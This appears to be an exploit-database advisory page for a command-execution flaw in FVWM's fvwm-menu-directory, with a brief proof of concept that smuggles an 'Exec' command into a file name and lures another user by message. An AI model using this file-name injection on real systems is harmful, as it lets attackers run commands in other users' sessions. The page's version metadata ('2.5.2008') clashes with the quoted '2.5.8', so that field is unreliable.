header-logo
Suggest Exploit
vendor:
FVWM
by:
Unknown
7.5
CVSS
HIGH
Command Execution
78
CWE
Product Name: FVWM
Affected Version From: 2.14.17
Affected Version To: 2.5.2008
Patch Exists: NO
Related CWE: Unknown
CPE: a:fvwm_project:fvwm
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Command Execution Vulnerability in FVWM

FVWM is prone to a command execution vulnerability that allows an attacker to execute arbitrary commands on a vulnerable system. The fvwm-menu-directory component does not properly sanitize user input, allowing a user with write permissions to a directory to execute arbitrary commands.

Mitigation:

It is recommended to sanitize user input properly in the fvwm-menu-directory component to prevent command execution vulnerabilities.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9161/info

It has been reported that FVWM may be prone to a command execution vulnerability that may allow an attacker to execute malicious commands on a vulnerable system. It has been reported that the fvwm-menu-directory component does not properly sanitize user input and allows a user with write permissions to a directory to execute arbitrary commands.

FVWM versions 2.14.17 and 2.5.8 have been reported to be vulnerable to this issue, however other versions may be affected as well. 

$ touch '
> Exec xmessage "0wn3d"
>
> '
$ write fvwmguy <<< "k3wl mp3 in `pwd` OMG LOLOLOL!!!1111"

Navigation

Suggest Exploit

Services By CQR